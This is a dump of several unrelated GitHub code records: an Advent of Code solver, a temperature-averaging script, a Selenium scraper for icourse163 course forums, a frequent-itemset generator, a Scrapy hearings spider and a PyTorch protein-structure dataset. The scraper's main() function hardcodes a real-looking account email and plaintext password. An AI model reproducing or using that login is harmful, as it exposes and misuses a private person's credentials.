tile_positions.values():\n continue\n other_edges = get_edges(other_tile)\n for direction, edge_a in enumerate(current_edges):\n for other_direction, edge_b in enumerate(other_edges):\n match = False\n needs_flip = False\n if edge_a == edge_b:\n match = True\n needs_flip = True\n if edge_a == edge_b[::-1]:\n match = True\n if match:\n d_x, d_y = direction_dict[direction]\n position = (current_position[0] + d_x, current_position[1] + d_y)\n if position not in tile_positions:\n relative_rotation = direction - other_direction + 2\n if relative_rotation < 0:\n relative_rotation += 4\n other_tile = rotate(other_tile, relative_rotation)\n if needs_flip:\n other_tile = flip(other_tile, direction in [0, 2])\n tile_dict[other_id] = other_tile\n tile_positions[position] = other_id\n open_set.add(position)\n \n min_x = min([x for x, y in tile_positions.keys()])\n max_x = max([x for x, y in tile_positions.keys()])\n min_y = min([y for x, y in tile_positions.keys()])\n max_y = max([y for x, y in tile_positions.keys()])\n\n assembled_grid = []\n for y in range(min_y, max_y + 1):\n for inner_y in range(1, len(tile_dict[start_tile_id]) - 1):\n line = \"\"\n for x in range(min_x, max_x + 1):\n other_tile = tile_dict[tile_positions[(x, y)]]\n 
line += other_tile[inner_y][1:-1]\n assembled_grid.append(line)\n assembled_grid = flip(assembled_grid, False)\n return assembled_grid, tile_positions\n\ndef find_sea_monsters(grid):\n sea_monster = [\n \" # \",\n \"# ## ## ###\",\n \" # # # # # # \"\n ]\n \n sea_monster_match = []\n sea_monster_match.append(re.compile(\"(?=(\" + sea_monster[0].replace(\" \", \".\") + \"))\"))\n sea_monster_match.append(re.compile(\"(?=(\" + sea_monster[1].replace(\" \", \".\") + \"))\"))\n sea_monster_match.append(re.compile(\"(?=(\" + sea_monster[2].replace(\" \", \".\") + \"))\"))\n\n sea_monster_count = 0\n for row in range(len(grid) - len(sea_monster_match) + 1):\n matches = []\n for pattern_index in range(len(sea_monster_match)):\n inner_matches = []\n for m in sea_monster_match[pattern_index].findall(grid[row + pattern_index]):\n inner_matches.append(grid[row + pattern_index].index(m))\n matches.append(inner_matches)\n for match_index in matches[1]:\n if match_index in matches[0] and match_index in matches[2]:\n sea_monster_count += 1\n for monster_index, monster_row in enumerate(sea_monster):\n for monster_char_index, monster_char in enumerate(monster_row):\n if monster_char == \"#\":\n grid[row + monster_index] = grid[row + monster_index][: match_index + monster_char_index] + \"O\" + grid[row + monster_index][match_index + monster_char_index + 1 :]\n roughness = sum([row.count(\"#\") for row in grid])\n\n return sea_monster_count != 0, roughness\n\ndef print_grid(grid):\n colorama.init()\n for row in grid:\n for char in row:\n if char == \"#\":\n print(colorama.Fore.BLUE, end='')\n elif char == \".\":\n print(colorama.Fore.CYAN, end='')\n elif char == \"O\":\n print(colorama.Fore.YELLOW, end='')\n else:\n assert False\n print(char + colorama.Style.RESET_ALL, end='')\n print()\n\naoc.run_raw(main, \"day20.txt\")","repo_name":"Fungu/advent_of_code","sub_path":"aoc_2020_python/day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":6479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"74271856365","text":"from io import open\n#ejercio leer el fichero de temperaturas, y sacar la media de cada mes \n#escrbir las temp media en un fichero..avgtemps.txt\n\n\nlist_media=[]\ndias = 0\nsuma =0\n##Lectura del fichero temperaturas\nwith open(\"temperatures.txt\",\"r\") as f: \n for line in f:\n arrTemp = [int (line) for line in line.strip().split(',')]\n suma =sum(arrTemp)\n list_media.append(suma / len(arrTemp))\nwith open(\"avgtemps.txt\",\"w\") as f: \n for media in list_media:\n f.write(str(media)+\"\\n\")\nprint(\"Se ha creado el fichero avgtemps.txt\")","repo_name":"kvnguevara/python","sub_path":"ficheros/mediaTemperatura.py","file_name":"mediaTemperatura.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"8270827801","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport time\nimport json\nimport datetime\nimport uuid\nimport logging\nimport settings\nimport selenium.webdriver\nimport selenium.webdriver.remote.webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom utils import parse_time\n\nkTargetUrl = 'https://www.icourse163.org/learn/HIT-1001515007'\nkRootUrl = 'https://www.icourse163.org/'\nkLoginUrl = 'https://www.icourse163.org/passport/sns/doOAuth.htm?snsType=6&oauthType=login&returnUrl=aHR0cHM6Ly93d3cuaWNvdXJzZTE2My5vcmcvaW5kZXguaHRtP2Zyb209c3R1ZHk='\n\n\nclass ForumFetcher:\n def run(self) -> dict:\n res = dict()\n res['forum_post_info'] = self.get_forum_info()\n return res\n\n def time_utils(self, type: int, time_str: str):\n time_str1 = ''\n if type == 1:\n time_str1 = time_str[1:5] + '-' + time_str[6:8] + '-' + time_str[9:11]\n return datetime.datetime.strptime(time_str1, '%Y-%m-%d')\n elif type == 2:\n if len(time_str.split(\"-\")) > 1:\n return datetime.datetime.strptime(time_str, '%Y-%m-%d')\n if len(time_str.split(\":\")) > 1:\n hour = int(time_str.split(\":\")[0])\n minute = int(time_str.split(\":\")[1])\n return datetime.datetime.now().replace(hour=hour, minute=minute)\n if time_str.find(\"分钟\") >= 0:\n minute = datetime.datetime.now().minute\n minute_diff = minute - int(time_str[0:time_str.find(\"分钟\")])\n if minute_diff > 0:\n return datetime.datetime.now().replace(minute=minute_diff)\n else:\n return datetime.datetime.now().replace(minute=0)\n month_index = time_str.find(\"月\")\n month = int(time_str[0:month_index])\n day = int(time_str[month_index+1:-1])\n return datetime.datetime.now().replace(month=month,day=day)\n\n def get_forum_info(self) -> list:\n res = list()\n self.__driver.get(\"http://www.icourse163.org/course/LZU-152001\")\n '''\n try:\n WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_css_selector(\"div.course-enroll-info_course-info_term-info_term-progress.unstarted\")\n )\n except selenium.common.exceptions.TimeoutException:\n print(\"未开课\")\n return res\n '''\n try:\n # TODO 貌似Headless模式被反爬了,这个地方headless加载不上\n main_page = WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_css_selector(\"span.ux-btn.ux-btn-.ux-btn-w220\"))\n except selenium.common.exceptions.TimeoutException:\n return res\n if '老师已关闭该学期,无法查看' == main_page.text.strip():\n return res\n main_page.click()\n time.sleep(10)\n try:\n notice = WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_partial_link_text(\"公告\"))\n except selenium.common.exceptions.TimeoutException:\n return res\n notice.click()\n time.sleep(1)\n\n try:\n discuss = WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_partial_link_text(\"讨论区\"))\n except selenium.common.exceptions.TimeoutException:\n return res\n discuss.click()\n time.sleep(2)\n #self.__driver.get(\"https://www.icourse163.org/learn/SWJTU-1001908004?tid=1207120209#/learn/forumindex\")\n while True:\n try:\n discuss_div = WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_css_selector(\"div.u-forumlistwrap.j-alltopiclist\").find_element_by_css_selector(\"div.m-data-lists.f-cb.f-pr.j-data-list\"))\n except selenium.common.exceptions.TimeoutException:\n return res\n lis = discuss_div.find_elements_by_tag_name(\"li\")\n for i in range(len(lis)):\n main_post = dict()\n try:\n discuss_div = WebDriverWait(self.__driver, 
self.__kWaitSecond).until(\n lambda x: x.find_element_by_css_selector(\"div.u-forumlistwrap.j-alltopiclist\").find_element_by_css_selector(\"div.m-data-lists.f-cb.f-pr.j-data-list\"))\n except selenium.common.exceptions.TimeoutException:\n return res\n li = discuss_div.find_elements_by_tag_name(\"li\")[i]\n userinfo = li.find_elements_by_css_selector(\"span.userInfo.j-userInfo\")[0]\n try:\n userinfo.find_element_by_css_selector(\"span.type.lector\")\n main_post['forum_post_userrole'] = 1\n except selenium.common.exceptions.NoSuchElementException:\n main_post['forum_post_userrole'] = 2\n try:\n name_a = userinfo.find_element_by_tag_name(\"a\")\n main_post['forum_post_username'] = name_a.get_attribute('title').strip()\n except selenium.common.exceptions.NoSuchElementException:\n main_post['forum_post_username'] = '匿名发表'\n main_post['forum_post_userrole'] = 0\n reply_time = li.find_elements_by_css_selector(\"span.lb10.f-fc9\")[0]\n main_post['forum_post_time'] = self.time_utils(1, reply_time.text.strip())\n discuss_a = li.find_element_by_css_selector(\"a.f-fc3.f-f0.lb10.j-link\")\n discuss_a.click()\n time.sleep(2)\n try:\n WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_class_name('j-post')\n )\n except selenium.common.exceptions.TimeoutException:\n logging.error('[ForumFetcher.get_forum_detail] Cannot load post div')\n\n main_post['forum_post_id'] = str(uuid.uuid1())\n main_post['forum_id'] = ''\n main_post['forum_name'] = self.__driver.find_element_by_xpath(\n '//*[@id=\"courseLearn-inner-box\"]/div/div[1]/div/a[2]').text\n div_main = self.__driver.find_element_by_class_name('j-post')\n main_post['forum_subject'] = div_main.find_element_by_class_name('j-title').text\n main_post['forum_post_content'] = div_main.find_element_by_class_name('j-content').text\n main_post['forum_post_type'] = 1\n main_post['forum_reply_id'] = '0'\n main_post['forum_reply_userid'] = ''\n main_post['update_time'] = datetime.datetime.now()\n print(main_post)\n res.append(main_post)\n try:\n div_reply_list = self.__driver.find_elements_by_xpath(\"//*[@id='courseLearn-inner-box']/div/div[2]/div/div[4]/div/div[1]/div[1]/div\")\n except selenium.common.exceptions.NoSuchElementException:\n continue\n # TODO 二级回复/多页回复未处理\n for div_reply_all in div_reply_list:\n div_reply = div_reply_all.find_element_by_class_name(\"m-detailInfoItem\")\n reply_content = div_reply.find_element_by_class_name('j-content').text\n post_reply['forum_post_userrole'] = 4\n try:\n reply_user = div_reply.find_element_by_class_name('userInfo').find_element_by_tag_name('a').text\n except selenium.common.exceptions.NoSuchElementException:\n reply_user = div_reply.find_element_by_class_name('anonyInfo').text\n post_reply['forum_post_userrole'] = 0\n try:\n div_reply.find_element_by_class_name('userInfo').find_element_by_css_selector(\"span.type.lector\")\n reply_is_teacher = True\n except selenium.common.exceptions.NoSuchElementException:\n reply_is_teacher = False\n reply_time = div_reply.find_element_by_class_name('j-time').text\n\n post_reply = dict()\n post_reply['forum_post_id'] = str(uuid.uuid1())\n post_reply['forum_id'] = ''\n post_reply['forum_name'] = main_post['forum_name']\n post_reply['forum_subject'] = main_post.get(\"forum_subject\")\n post_reply['forum_post_type'] = 2\n post_reply['forum_reply_id'] = main_post['forum_post_id']\n post_reply['forum_reply_userid'] = ''\n post_reply['forum_post_username'] = reply_user\n # TODO User role type should be a enum val\n if 
post_reply.get(\"forum_post_userrole\") != 0:\n post_reply['forum_post_userrole'] = 1 if reply_is_teacher else 2\n post_reply['forum_post_content'] = reply_content\n post_reply['forum_post_time'] = self.time_utils(2, reply_time)\n post_reply['update_time'] = datetime.datetime.now()\n res.append(post_reply)\n print(post_reply)\n comment_a = div_reply.find_element_by_css_selector(\"a.f-fr.f-fc9.opt.cmtBtn.j-cmtBtn\")\n if comment_a.text.strip()[3:-1] != '0':\n\n #self.__driver.execute_script(\"arguments[0].scrollIntoView();\", comment_a)\n comment_a.click()\n\n #self.__driver.execute_script(\"$(arguments[0]).click()\", comment_a)\n time.sleep(2)\n try:\n div_reply2 = div_reply_all.find_element_by_class_name(\"m-commentWrapper\")\n except selenium.common.exceptions.NoSuchElementException:\n continue\n m_data_lists = div_reply2.find_element_by_class_name(\"m-data-lists\")\n m_divs = m_data_lists.find_elements_by_class_name(\"m-detailInfoItem\")\n for j in range(len(m_divs)):\n post_reply1 = dict()\n post_reply1['forum_post_id'] = str(uuid.uuid1())\n post_reply1['forum_id'] = ''\n post_reply1['forum_name'] = main_post['forum_name']\n post_reply1['forum_subject'] = main_post.get(\"forum_subject\")\n post_reply1['forum_post_type'] = 2\n post_reply1['forum_reply_id'] = post_reply1['forum_post_id']\n post_reply1['forum_reply_userid'] = ''\n # TODO User role type should be a enum val\n post_reply1['forum_post_userrole'] = 4\n m_div = m_data_lists.find_elements_by_class_name(\"m-detailInfoItem\")[j]\n try:\n m_div.find_element_by_css_selector(\"span.type.lector\")\n post_reply1['forum_post_userrole'] = 1\n except selenium.common.exceptions.NoSuchElementException:\n post_reply1['forum_post_userrole'] = 2\n try:\n m_div.find_element_by_css_selector(\"a.f-fcgreen\")\n except selenium.common.exceptions.NoSuchElementException:\n post_reply1['forum_post_userrole'] = 0\n\n reply_content = m_div.find_element_by_class_name(\"f-richEditorText\").text.strip()\n if post_reply1.get(\"forum_post_userrole\") == 0:\n reply_user = '匿名发表'\n else:\n reply_user = m_div.find_element_by_css_selector(\"a.f-fcgreen\").get_attribute(\"title\")\n reply_time = m_div.find_element_by_css_selector(\"div.f-fl.f-fc9.time.j-time\").text.strip()\n post_reply1['forum_post_username'] = reply_user\n post_reply1['forum_post_content'] = reply_content\n post_reply1['forum_post_time'] = self.time_utils(2, reply_time)\n post_reply1['update_time'] = datetime.datetime.now()\n print(post_reply1)\n res.append(post_reply1)\n self.__driver.back()\n time.sleep(2)\n try:\n next_page = WebDriverWait(self.__driver, self.__kWaitSecond).until(\n lambda x: x.find_element_by_partial_link_text(\"下一页\"))\n except selenium.common.exceptions.TimeoutException:\n return res\n if next_page.get_attribute('class') == 'zbtn znxt js-disabled':\n break\n else:\n next_page.click()\n time.sleep(2)\n print(len(res))\n return res\n\n def __init__(self,\n driver: selenium.webdriver.remote.webdriver.WebDriver, wait_time=10):\n self.__driver = driver\n self.__kWaitSecond = wait_time\n\n\ndef main():\n print(datetime.datetime.now())\n start_time = datetime.datetime.now().timestamp()\n options = selenium.webdriver.ChromeOptions()\n browser = selenium.webdriver.Chrome(options=options)\n browser.get('https://www.icourse163.org/')\n login = browser.find_element_by_partial_link_text(\"登录\")\n login.click()\n ux_login = browser.find_element_by_class_name(\"ux-login-set-login-set-panel\")\n email_login = ux_login.find_elements_by_tag_name(\"li\")[1]\n email_login.click()\n 
time.sleep(2)\n j_urs_container = ux_login.find_element_by_id(\"j-ursContainer-0\")\n iframe1 = WebDriverWait(j_urs_container, 5).until(\n lambda x: x.find_element_by_tag_name(\"iframe\"))\n browser.switch_to.frame(iframe1)\n login_form = browser.find_element_by_id(\"login-form\")\n username = login_form.find_elements_by_class_name(\"inputbox\")[0].find_elements_by_tag_name(\"input\")[0]\n username.send_keys(\"ghliang88@163.com\")\n password = login_form.find_elements_by_class_name(\"inputbox\")[1].find_elements_by_tag_name(\"input\")[1]\n password.send_keys(\"G1&h2&l3\")\n login1 = login_form.find_element_by_partial_link_text(\"登录\")\n login1.click()\n time.sleep(2)\n course = browser.find_elements_by_class_name(\"m-slideTop-cateFunc-f\")[0]\n course.click()\n time.sleep(5)\n windows = browser.window_handles\n browser.switch_to_window(windows[-1])\n\n courses = browser.find_element_by_xpath(\"//*[@id='app']/div/div/div[2]/div[1]/div[2]/div/div/div/ul/div[1]\")\n time.sleep(2)\n courses.click()\n windows = browser.window_handles\n browser.switch_to_window(windows[-1])\n forum = ForumFetcher(browser)\n print(forum.run())\n print(datetime.datetime.now())\n end_time = datetime.datetime.now().timestamp()\n print((end_time - start_time) / 60.0)\n\nif __name__ == '__main__':\n main()\n","repo_name":"haowenmvp/mooc_crawler","sub_path":"tests/icourse163/icourse163.py","file_name":"icourse163.py","file_ext":"py","file_size_in_byte":15299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"71378885168","text":"from os import stat\nfrom typing import Iterable, List, Dict, Optional, Tuple\nfrom itertools import combinations\nimport random\nimport json\nfrom numpy.random.mtrand import random_sample\nimport pandas as pd\n\n\nclass FrequentItemsetGenerator(object):\n\n def __init__(\n self, \n items: Optional[Iterable]=None,\n frequency_range: Tuple[float, float] = (0.1, 0.2),\n union_limits: Tuple[float, float] = (0.2, 0.3),\n isolated_frequency_limit: float = 0.1\n ) -> None:\n \"\"\"初始化生成器\n\n :param items: 生成数据的元素集合, defaults to None, 缺省会使用[0, 1, 2... 99]代替。\n :type items: Optional[Iterable], optional\n :param frequency_range: 频繁项集概率分布范围, defaults to (0.1, 0.2)\n :type frequency_range: Tuple[float, float], optional\n :param union_limits: 频繁项并集概率分布限制范围, defaults to (0.2, 0.3)\n :type union_limits: Tuple[float, float], optional\n :param isolated_frequency_limit: 独立项概率分布限制, defaults to 0.1\n :type isolated_frequency_limit: float, optional\n\n 在默认情况下,初始化的元素为:\n \n >>> items = {0, 1, 2, ... 99}\n\n frequency_range = (0.1, 0.2), 即\n\n >>> 0.1 < P({0, 1, 2}) < 0.2\n\n union_limits=(0.2, 0.3), 即\n\n >>> 0.2 < P({0, 1, 2} | {0, 1} | {0, 2} | {1, 2} | {0} | {1} | {2}) < 0.3\n\n isolated_frequency_limit=0.1 即\n\n >>> P({99}) < 0.1\n \n 这里 {99} 为独立的一项\n \"\"\"\n self.items = list(items) if isinstance(items, Iterable) else list(range(100))\n self.frequency_range = frequency_range\n self.union_limits = union_limits\n self.isolated_frequency_limit = isolated_frequency_limit\n \n def proportion_batches(self, itemset_sizes: Iterable) -> list:\n items = self.items.copy()\n random.shuffle(items)\n index = 0\n batches = []\n for itemset_counts in itemset_sizes:\n itemsets = items[index:index+itemset_counts]\n batch = self.itemsets_frequency(itemsets)\n batches.append(list(batch))\n index += itemset_counts\n\n for item in items[index:]:\n prop = self.random_range(0, self.isolated_frequency_limit)\n batches.append([((item,), prop)])\n \n return batches\n\n @staticmethod\n def batch2dict(batches: list) -> dict:\n dct = {}\n for batch in batches:\n for key, value in batch:\n dct[key] = value\n return dct\n \n @staticmethod\n def batch2json(batches: list) -> list:\n result = []\n for batch in batches:\n for key, value in batch:\n result.append({\n \"itemset\": list(key),\n \"proportion\": value\n })\n return json.dumps(result)\n \n @staticmethod\n def batch2df(batches: list) -> pd.DataFrame:\n result = []\n for index, batch in enumerate(batches):\n for key, value in batch:\n result.append({\n \"itemset\": list(key),\n \"support\": value,\n \"batch\": index\n })\n return pd.DataFrame(result)\n \n @staticmethod\n def df2batch(batches: pd.DataFrame) -> list:\n result = []\n for _id, df in batches.groupby(\"batch\"):\n result.append(\n [(tuple(doc[\"itemset\"]), doc[\"proportion\"]) for doc in df.to_dict(\"record\")]\n )\n return result\n\n\n @staticmethod\n def write_batch_parquet(filename: str, batches: pd.DataFrame):\n from pyarrow import parquet as pq\n from pyarrow import Table\n\n table = Table.from_pandas(batches)\n pq.write_table(table, filename)\n \n @staticmethod\n def read_batch_parquet(filename: str) -> pd.DataFrame:\n from pyarrow import parquet as pq\n return pq.read_table(filename).to_pandas()\n\n def generate_from_batch(self, batches: list, samples: int):\n data = [list() for i in range(samples)]\n for batch in batches:\n itemset_counts = [(itemset, int(prop*samples)) for itemset, prop in batch]\n total_counts = sum([item[1] for item in itemset_counts])\n sample_itemsets = 
random.sample(data, total_counts)\n index = 0\n for itemset, count in itemset_counts:\n for sample in sample_itemsets[index:index+count]:\n sample.extend(itemset)\n index += count\n return data\n\n def generate(self, itemset_sizes: Iterable=(3,)*5, samples: int=100000) -> Tuple[List, Dict]:\n batches = self.proportion_batches(itemset_sizes)\n data = self.generate_from_batch(batches, samples)\n return data, self.batch2dict(batches)\n\n def generate_df(self, itemset_sizes: Iterable=(3,)*5, samples: int = 100000):\n \"\"\"生成样本数据,同generate\n\n :return: (data, proportion)\n samples: 生成的数据样本\n proportion: 数据样本中各项的比例 \n :rtype: Tuple[pandas.DataFrame, Dict]\n \"\"\"\n data, proportions = self.generate(itemset_sizes, samples)\n return pd.DataFrame({\"itemsets\": data}), proportions\n\n @staticmethod\n def gen_empty_list(size: int):\n for i in range(size):\n yield list()\n \n @staticmethod\n def random_range(start: float, end: float) -> float:\n return start + (end-start) * random.random()\n\n @staticmethod\n def random_sequence(start: float, end: float, size: int):\n block_size = (end-start)/size\n return [FrequentItemsetGenerator.random_range(start+i*block_size, start+(i+1)*block_size) for i in range(size)]\n\n def itemsets_frequency(self, itemsets: List):\n combs = []\n for size in reversed(range(1, len(itemsets)+1)):\n for comb in combinations(itemsets, size):\n combs.append(comb)\n sup = self.random_range(self.frequency_range[0], self.frequency_range[1])\n limit = self.random_range(self.union_limits[0], self.union_limits[1])\n acc_frequency = self.random_sequence(sup, limit, len(combs))\n frequency = acc_frequency.copy()\n for i, f in enumerate(map(lambda a,b: a-b, acc_frequency[1:],acc_frequency[:-1])):\n frequency[i+1] = f\n\n return zip(combs, frequency)\n","repo_name":"cheatm/sparkbdgen","sub_path":"sparkbdgen/associations/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":6445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"32863052586","text":"# pylint: disable=R0201,missing-docstring\n__author__ = 'Shaharyar Ahmad'\nfrom scrapy import Spider, Request\nfrom House_Committee_Oversight.items import HCOItem\nfrom House_Committee_Oversight.pipelines import process_string\n\nclass MainSpider(Spider):\n name = \"MainSpider\"\n start_urls = [\"http://oversight.house.gov/hearings/\"]\n \n def parse(self, response):\n\n rows = response.selector.xpath(\n '//*[@id=\"bodyContent\"]/div[1]/div[1]/div')\n for rows in rows:\n item = HCOItem()\n\n item['url'] = rows.xpath('div/h3/a/@href').extract()\n item['title'] = process_string(\n rows.xpath('div/h3/a/text()').extract()[0])\n item['Subcommittee'] = rows.xpath(\n 'div[1]/div[1]/a/text()').extract()\n if item['Subcommittee'] == []:\n item['Subcommittee'] = \"[Not Mentioned]\"\n time_date = rows.xpath('div[1]/div[2]/text()').extract()\n item['publishdate'] = time_date[0].split('|')[0]\n item['publishtime'] = time_date[0].split('|')[1].split('m')[0] + \"m.\"\n if item['publishtime'] == \"m.\":\n item['publishtime'] = \"Not Mentioned\"\n item[\n 'Source'] = \"House Committee on Oversight and Government Reform\"\n item['_type'] = \"Hearings\"\n item['ekwhere'] = \"Fed\"\n yield item\n\n def start_requests(self):\n for count in range(1, 91):\n yield Request(\"%spage/%d/\" % (self.start_urls[0], count), self.parse)\n \n","repo_name":"shaharyarrrr/scrapy","sub_path":"Spiders/House_Committee_Oversight/House_Committee_Oversight/spiders/MainSpider.py","file_name":"MainSpider.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"24391578156","text":"import json\nimport logging\nimport math\nfrom pathlib import Path\nfrom typing import Dict\n\nimport torch\nfrom Bio import SeqIO\nfrom Bio.PDB import PDBParser\nfrom Bio.SeqUtils import seq1\nfrom torch.nn import functional as F\nfrom torch.utils.data import Dataset\n\nLOG = logging.getLogger(__name__)\n\nAMINO_TO_NUM = {\n \"A\": 0, # Alanine\n \"C\": 1, # Cysteine\n \"D\": 2, # Aspartic Acid\n \"E\": 3, # Glutamic Acid\n \"F\": 4, # Phenylalanine\n \"G\": 5, # Glycine\n \"H\": 6, # Histidine\n \"I\": 7, # Isoleucine\n \"K\": 8, # Lysine\n \"L\": 9, # Leucine\n \"M\": 10, # Methionine\n \"N\": 11, # Asparagine\n \"P\": 12, # Proline\n \"Q\": 13, # Glutamine\n \"R\": 14, # Arginine\n \"S\": 15, # Serine\n \"T\": 16, # Threonine\n \"V\": 17, # Valine\n \"W\": 18, # Tryptophan\n \"Y\": 19, # Tyrosine\n \"U\": 20, # Selenocysteine\n}\n\n\nclass H3Dataset(Dataset):\n def __init__(self, dataset_dir: Path) -> None:\n super().__init__()\n\n self._pdb_file_list = list(\n dataset_dir.joinpath(\"pdb\", \"truncated\").glob(\"*.pdb\")\n )\n self._fasta_dir = dataset_dir.joinpath(\"fasta\")\n self._fasta_dir.mkdir(parents=True, exist_ok=True)\n\n @staticmethod\n def convert_pdb_to_fasta(pdb: Path, fasta: Path) -> None:\n pdb_id = pdb.stem\n parser = PDBParser()\n structure = parser.get_structure(pdb_id, pdb)\n\n fasta_str = \"\"\n for chain in structure.get_chains():\n seq = seq1(\"\".join([residue.resname for residue in chain]))\n description = {\"id\": pdb_id, \"chain\": chain.id, \"length\": len(seq)}\n fasta_str += f\">{json.dumps(description)}\\n\"\n for i in range(0, len(seq), 80):\n fasta_str += f\"{seq[i:i + 80]}\\n\"\n\n with fasta.open(\"w\") as fd:\n fd.write(fasta_str)\n\n @staticmethod\n def get_sequences(fasta: Path) -> Dict[str, str]:\n sequences = {}\n for record in SeqIO.parse(fasta, \"fasta\"):\n # pylint: disable=bare-except\n try:\n description = json.loads(record.description)\n chain_id = description[\"chain\"]\n except:\n LOG.warning(\"description is not json format in %s\", fasta)\n chain_id = record.description[:2]\n\n sequences[chain_id] = record.seq.upper()\n return sequences\n\n @staticmethod\n def _generate_dist_matrix(\n coords: torch.Tensor,\n mask: torch.Tensor,\n mask_fill_value: float = -1,\n ):\n coords = coords.unsqueeze(0)\n dist_mat_shape = (coords.shape[1], coords.shape[1], coords.shape[2])\n row_expand = coords.transpose(0, 1).expand(dist_mat_shape)\n col_expand = coords.expand(dist_mat_shape)\n dist_mat = (row_expand - col_expand).norm(dim=2)\n\n n = len(mask)\n not_mask = torch.ones(n).type(dtype=mask.dtype) - mask\n not_mask = (\n not_mask.unsqueeze(0).transpose(0, 1).expand(n, n).add(not_mask)\n )\n dist_mat[not_mask > 0] = mask_fill_value\n\n return dist_mat\n\n @staticmethod\n def _generate_cb_cb_dihedral(\n ca_coords: torch.Tensor,\n cb_coords: torch.Tensor,\n mask: torch.Tensor,\n mask_fill_value: float = -1,\n ):\n mat_shape = (ca_coords.shape[0], ca_coords.shape[0], ca_coords.shape[1])\n\n b1 = (cb_coords - ca_coords).expand(mat_shape)\n b2 = cb_coords.expand(mat_shape)\n b2 = b2.transpose(0, 1) - b2\n b3 = -1 * b1.transpose(0, 1)\n\n n1 = torch.cross(b1, b2)\n n1 /= n1.norm(dim=2, keepdim=True)\n n2 = torch.cross(b2, b3)\n n2 /= n2.norm(dim=2, keepdim=True)\n m1 = torch.cross(b2 / b2.norm(dim=2, keepdim=True), n1)\n\n dihedral_mat = torch.atan2((m1 * n2).sum(-1), (n1 * n2).sum(-1))\n dihedral_mat *= 180 / math.pi\n\n mask = mask.expand((len(mask), len(mask)))\n mask = mask & mask.transpose(0, 1)\n dihedral_mat[mask == 
0] = mask_fill_value\n\n return dihedral_mat\n\n @staticmethod\n def _generate_ca_cb_dihedral(\n ca_coords: torch.Tensor,\n cb_coords: torch.Tensor,\n n_coords: torch.Tensor,\n mask: torch.Tensor,\n mask_fill_value: float = -1,\n ):\n mat_shape = (ca_coords.shape[0], ca_coords.shape[0], ca_coords.shape[1])\n\n b1 = (ca_coords - n_coords).expand(mat_shape)\n b2 = (cb_coords - ca_coords).expand(mat_shape)\n b3 = cb_coords.expand(mat_shape)\n b3 = b3.transpose(0, 1) - b3\n\n n1 = torch.cross(b1, b2)\n n1 /= n1.norm(dim=2, keepdim=True)\n n2 = torch.cross(b2, b3)\n n2 /= n2.norm(dim=2, keepdim=True)\n m1 = torch.cross(b2 / b2.norm(dim=2, keepdim=True), n1)\n\n dihedral_mat = torch.atan2(\n (m1 * n2).sum(-1), (n1 * n2).sum(-1)\n ).transpose(0, 1)\n dihedral_mat *= 180 / math.pi\n\n mask = mask.expand((len(mask), len(mask)))\n mask = mask & mask.transpose(0, 1)\n dihedral_mat[mask == 0] = mask_fill_value\n\n return dihedral_mat\n\n @staticmethod\n def _generate_ca_cb_cb_planar(\n ca_coords: torch.Tensor,\n cb_coords: torch.Tensor,\n mask: torch.Tensor,\n mask_fill_value: float = -1,\n ):\n mat_shape = (ca_coords.shape[0], ca_coords.shape[0], ca_coords.shape[1])\n\n v1 = (ca_coords - cb_coords).expand(mat_shape)\n v2 = cb_coords.expand(mat_shape)\n v2 = v2.transpose(0, 1) - v2\n\n planar_mat = (v1 * v2).sum(-1) / (v1.norm(dim=2) * v2.norm(dim=2))\n planar_mat = torch.acos(planar_mat).transpose(0, 1)\n planar_mat *= 180 / math.pi\n\n mask = mask.expand((len(mask), len(mask)))\n mask = mask & mask.transpose(0, 1)\n planar_mat[mask == 0] = mask_fill_value\n\n return planar_mat\n\n @classmethod\n def get_label_from_pdb(cls, pdb: Path):\n parser = PDBParser()\n structure = parser.get_structure(pdb.stem, pdb)\n residues = list(structure.get_residues())\n\n def get_cb_or_ca_coord(residue):\n if \"CB\" in residue:\n return residue[\"CB\"].get_coord()\n\n if \"CA\" in residue:\n return residue[\"CA\"].get_coord()\n\n return [0, 0, 0]\n\n def get_atom_coord(residue, atom_type):\n if atom_type in residue:\n return residue[atom_type].get_coord()\n return [0, 0, 0]\n\n cb_ca_coords = torch.tensor([get_cb_or_ca_coord(r) for r in residues])\n ca_coords = torch.tensor([get_atom_coord(r, \"CA\") for r in residues])\n cb_coords = torch.tensor([get_atom_coord(r, \"CB\") for r in residues])\n n_coords = torch.tensor([get_atom_coord(r, \"N\") for r in residues])\n\n cb_mask = torch.ByteTensor([1 if sum(_) != 0 else 0 for _ in cb_coords])\n mask = torch.ByteTensor([1] * len(cb_coords))\n\n output_matrix = torch.stack(\n [\n cls._generate_dist_matrix(cb_ca_coords, mask=mask),\n cls._generate_cb_cb_dihedral(\n ca_coords, cb_coords, mask=(mask & cb_mask)\n ),\n cls._generate_ca_cb_dihedral(\n ca_coords, cb_coords, n_coords, mask=(mask & cb_mask)\n ),\n cls._generate_ca_cb_cb_planar(\n ca_coords, cb_coords, mask=(mask & cb_mask)\n ),\n ]\n ).type(torch.float)\n\n return output_matrix\n\n @staticmethod\n def get_h3_cdr_indices(pdb: Path):\n parser = PDBParser()\n structure = parser.get_structure(pdb.stem, pdb)\n chain = structure[0][\"H\"]\n min_i = 200\n max_i = 0\n for i, res in enumerate(chain):\n if 95 <= res.id[1] <= 102:\n if i < min_i:\n min_i = i\n if i > max_i:\n max_i = 